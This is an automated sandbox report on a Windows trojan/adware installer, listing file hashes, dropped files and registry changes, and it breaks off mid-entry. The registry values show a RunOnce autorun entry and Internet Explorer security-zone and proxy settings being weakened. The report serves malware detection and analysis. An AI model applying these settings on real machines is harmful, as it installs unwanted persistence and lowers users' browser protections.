Trojan.NSIS.StartPage_358c5cfa47

by malwarelabrobot on April 30th, 2016 in Malware Descriptions.

not-a-virus:AdWare.Win32.ConvertAd.beu (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 358c5cfa475c092625893377a53bb4b4
SHA1: 7e460e49b9cc61530194cfa9a67f7b470775db4e
SHA256: 03c6607b9417343d06afe8d9f31c480ec3414ebee81930568d9785c083de607d
SSDeep: 6144:ezfj/bWIcLbT57oVD5YjbfRf6lU8/qxDNgALdjEfDQ69uX7utrq:E/qIcLp7oRyjNf6K8SxDmAaF9uX7uY
Size: 462192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nsz1D.tmp:584
nsh16.tmp:1976
%original file name%.exe:348
qnse20.tmp:532
qnse20.tmp:1764
nsa22.tmp:2036
nsoA.tmp:320
Full_Setup.exe:1240

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nsz1D.tmp:584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp\WmiInspector.dll (3342 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp (2660 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nse20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp\WmiInspector.dll (0 bytes)

The process nsh16.tmp:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\KillProcDLL.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nsz1D.tmp (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (37949 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe (1184 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nsz1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\WmiInspector.dll (0 bytes)

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (2 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (14400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr17.tmp (43 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\CAW5CX8N.htm (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (201 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\CAQ1ETAB.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb13.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[2].htm (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg15.tmp (0 bytes)

The process nsa22.tmp:2036 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb24.tmp (0 bytes)

The process nsoA.tmp:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\KrMubhB0c[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\vos_n[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\zEuCD[1] (36408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa22.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp (0 bytes)

The process Full_Setup.exe:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd7.tmp (6720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)

Registry activity

The process nsz1D.tmp:584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 8F 79 FF 6B 9B AE B3 B6 45 5D DE AE E8 5D B7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayIcon" = "/fd="

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsh16.tmp:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 4B 68 8E 88 3A C8 91 63 5F 97 1C 31 A8 61 19"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayName" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"Publisher" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe"

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayName" = "Installer Package"

"Publisher" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC BA 94 BB EE E3 5F F3 24 E0 72 47 EF 19 2F FD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file under the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process qnse20.tmp:532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 94 00 06 6F D2 9B AB 07 B3 FD 8F 33 E8 B6 0E"

The process qnse20.tmp:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 45 AD 46 95 1C 76 24 DD 54 E4 75 F2 1F CF 44"

The process nsa22.tmp:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 07 A5 5F 90 50 5F 8E 21 D8 A5 30 CC 6A 99 F9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsoA.tmp:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 69 3E 45 83 1E D3 C3 FC 76 C5 D0 C5 5B A2 B4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Full_Setup.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 E4 6C 63 7F 33 54 C6 C2 9B 1D CE A6 62 A1 97"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
